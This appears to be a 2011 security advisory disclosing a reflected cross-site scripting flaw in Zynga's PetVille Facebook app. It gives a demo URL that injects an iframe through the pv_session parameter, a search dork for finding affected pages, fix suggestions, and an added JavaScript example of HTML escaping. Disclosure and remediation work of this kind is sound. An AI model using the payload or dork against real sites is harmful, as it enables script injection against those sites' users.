
Zynga Petville Cross Site Scripting

Posted on 30 August 2011

------------------------------------------------------------
TITLE: Type-0 XSS bug in ZYNGA PETVILLE (facebook apps)
vendor: www.apps.facebook.com/petvillegame/**[]
Author: r007k17-w a.k.a Raghavendra Karthik.D
Email: n4gb07@gmail.com
My blog: http://shadowrootkit.wordpress.com/
Google Dork: Copyright 2010 Zynga Game Network Inc
------------------------------------------------------------

DEMO: http://apps.facebook.com/petvillegame/money.php?ref=&pv_session="><iframe src="http://www.google.com"></iframe>

SUG: HTML encoding, escaping special characters, input sanitization.

------------------------------------------------------------
gr33t1ngs to s1d3-3ff3cts and all my friends
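
The SUG line above, worked through as an added example (not part of the original advisory and not Zynga's code): the same pv_session value rendered without and with HTML encoding, plus an allowlist check. The hidden-input markup, the token format and all function names are assumptions made for illustration.

```javascript
// Added example, not Zynga's code. The hidden-input markup and function
// names are assumptions; only the pv_session parameter and the DEMO URL
// come from the advisory.
const DEMO_URL = 'http://apps.facebook.com/petvillegame/money.php' +
  '?ref=&pv_session="><iframe src="http://www.google.com"></iframe>';

// Assumed session-token format, used for allowlist input validation.
const SESSION_RE = /^[A-Za-z0-9_-]{1,128}$/;

const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
};

// Encode characters that are significant in HTML text and quoted attributes.
// A single pass with a lookup map avoids double-encoding the '&' of entities.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

function getSessionParam(url) {
  return new URL(url).searchParams.get('pv_session') || '';
}

function isValidSession(value) {
  return SESSION_RE.test(value);
}

// "Before": the parameter is concatenated into a quoted attribute as-is,
// so a value starting with "> closes the attribute and the tag.
function renderUnsafe(url) {
  return '<input type="hidden" name="pv_session" value="' +
    getSessionParam(url) + '">';
}

// "After": same markup with the value HTML-encoded at the point of output.
function renderSafe(url) {
  return '<input type="hidden" name="pv_session" value="' +
    escapeHtml(getSessionParam(url)) + '">';
}

console.log('valid token?', isValidSession(getSessionParam(DEMO_URL)));
console.log('unsafe:', renderUnsafe(DEMO_URL));
console.log('safe:  ', renderSafe(DEMO_URL));
```

In browser-side code the equivalent of renderSafe is to assign the value through textContent or setAttribute rather than building markup as a string.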

 
